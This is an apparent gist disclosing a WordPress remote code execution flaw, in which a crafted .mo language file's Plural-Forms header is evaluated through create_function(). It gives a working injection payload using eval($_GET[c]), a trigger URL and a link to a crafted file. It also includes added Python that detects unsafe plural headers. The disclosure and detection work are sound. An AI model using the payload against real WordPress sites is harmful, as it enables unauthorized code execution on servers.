anonymous /.md Secret
Created Oct 8, 2016

WordPress RCE via specially crafted .mo language file

The vulnerable code in wp-includes/pomo/translations.php:

    function make_plural_form_function($nplurals, $expression) {
        $expression = str_replace('n', '$n', $expression);
        $func_body = "
            \$index = (int)($expression);
            return (\$index < $nplurals)? \$index : $nplurals - 1;";
        return create_function('$n', $func_body);
    }

PHP's create_function() internally calls zend_eval_stringl(), so an attacker can use } to close the anonymous function and execute arbitrary code while the anonymous function is being created :-)

PoC:

Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;

I provide a crafted .mo language file; you can set the default language to Chinese, then access the following URL, and the phpinfo() function will be executed.

/index.php?c=phpinfo();

The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM
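
A defender-side check for the header described above, as an added example that is not part of the original gist or of WordPress: it reads the metadata entry of a .mo file and flags any Plural-Forms value whose expression contains more than the variable n, digits, parentheses and C operators. The function names, the allowlist and the sample files are assumptions constructed for this illustration.

```python
import re
import struct

# Allowlist for a gettext plural expression: the variable n, digits,
# whitespace, parentheses and C operators. Nothing else is needed.
SAFE_EXPR = re.compile(r"[n0-9\s()?:|&=!<>+\-*/%]+")
PLURAL_FORMS = re.compile(r"\s*nplurals\s*=\s*(\d+)\s*;\s*plural\s*=\s*(.+?)\s*;?\s*")

def mo_header(data: bytes) -> str:
    """Return the metadata block of a .mo file (translation of the empty msgid)."""
    # The magic number 0x950412de tells us the byte order of the file.
    end = {b"\xde\x12\x04\x95": "<", b"\x95\x04\x12\xde": ">"}.get(data[:4])
    if end is None:
        raise ValueError("not a .mo file")
    try:
        _rev, count, orig_off, trans_off = struct.unpack_from(end + "4I", data, 4)
        for i in range(count):
            olen, _ = struct.unpack_from(end + "2I", data, orig_off + 8 * i)
            if olen == 0:  # the empty msgid marks the header entry
                tlen, toff = struct.unpack_from(end + "2I", data, trans_off + 8 * i)
                return data[toff:toff + tlen].decode("utf-8", "replace")
    except struct.error:
        raise ValueError("truncated .mo file") from None
    return ""

def audit_plural_forms(data: bytes):
    """Return (ok, value). ok is False when Plural-Forms is not a plain expression."""
    for line in mo_header(data).splitlines():
        name, _, value = line.partition(":")
        if name.strip().lower() == "plural-forms":
            m = PLURAL_FORMS.fullmatch(value)
            ok = bool(m and SAFE_EXPR.fullmatch(m.group(2)))
            return ok, value.strip()
    return True, None  # no Plural-Forms header, nothing would be evaluated

def build_mo(header: str) -> bytes:
    """Constructed sample: minimal little-endian .mo with only the header entry."""
    trans = header.encode()
    table = struct.pack("<11I", 0x950412DE, 0, 1, 28, 36, 0, 44, 0, 44, len(trans), 45)
    return table + b"\0" + trans + b"\0"

# Constructed inputs: a normal header, and the header line from the PoC above.
BENIGN = build_mo("Language: en\nPlural-Forms: nplurals=2; plural=(n != 1);\n")
CRAFTED = build_mo("Language: zh_CN\nPlural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;\n")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(label, audit_plural_forms(blob))
```

Running the same check over every .mo file under wp-content/languages before it is loaded treats translation files as untrusted input rather than as code.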
